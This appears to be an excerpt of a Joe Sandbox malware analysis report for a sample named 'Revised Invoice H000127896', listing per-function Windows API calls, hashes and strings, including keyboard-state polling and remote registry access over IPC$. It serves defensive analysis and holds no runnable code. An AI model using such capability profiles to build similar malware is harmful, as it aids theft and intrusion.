                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                              • String ID:
                              • API String ID: 136442275-0
                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                              APIs
                              • _wcsncpy.LIBCMT ref: 00467490
                              • _wcsncpy.LIBCMT ref: 004674BC
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcstok.LIBCMT ref: 004674FF
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcstok.LIBCMT ref: 004675B2
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcscpy.LIBCMT ref: 00467641
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcslen.LIBCMT ref: 004677BD
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                              • String ID: X
                              • API String ID: 3104067586-3081909835
                              • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                              • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                              • _wcslen.LIBCMT ref: 0046CDB0
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                              Strings
                              • NULL Pointer assignment, xrefs: 0046CEA6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                              • String ID: NULL Pointer assignment
                              • API String ID: 440038798-2785691316
                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                              APIs
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                              • _wcslen.LIBCMT ref: 004610A3
                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                              • GetWindowRect.USER32(?,?), ref: 00461248
                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                              • String ID: ThumbnailClass
                              • API String ID: 4136854206-1241985126
                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                              • GetClientRect.USER32(?,?), ref: 00471A1A
                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                              • String ID: 2
                              • API String ID: 1331449709-450215437
                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                              • API String ID: 3054410614-2561132961
                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                              • API String ID: 600699880-22481851
                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: static
                              • API String ID: 3375834691-2160076837
                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                              • API String ID: 2907320926-3566645568
                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                              • DeleteObject.GDI32(00790000), ref: 00470A04
                              • DestroyIcon.USER32(00740073), ref: 00470A1C
                              • DeleteObject.GDI32(760A7831), ref: 00470A34
                              • DestroyWindow.USER32(0044006D), ref: 00470A4C
                              • DestroyIcon.USER32(?), ref: 00470A73
                              • DestroyIcon.USER32(?), ref: 00470A81
                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                              • String ID:
                              • API String ID: 1237572874-0
                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                              • VariantInit.OLEAUT32(?), ref: 004793E1
                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                              • VariantClear.OLEAUT32(?), ref: 00479489
                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                              • VariantClear.OLEAUT32(?), ref: 004794CA
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                              • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044480E
                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                              • GetKeyState.USER32(000000A0), ref: 004448AA
                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                              • GetKeyState.USER32(000000A1), ref: 004448D9
                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                              • GetKeyState.USER32(00000011), ref: 00444903
                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                              • GetKeyState.USER32(00000012), ref: 0044492D
                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                              • GetKeyState.USER32(0000005B), ref: 00444958
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                              • String ID:
                              • API String ID: 3413494760-0
                              • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                              • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
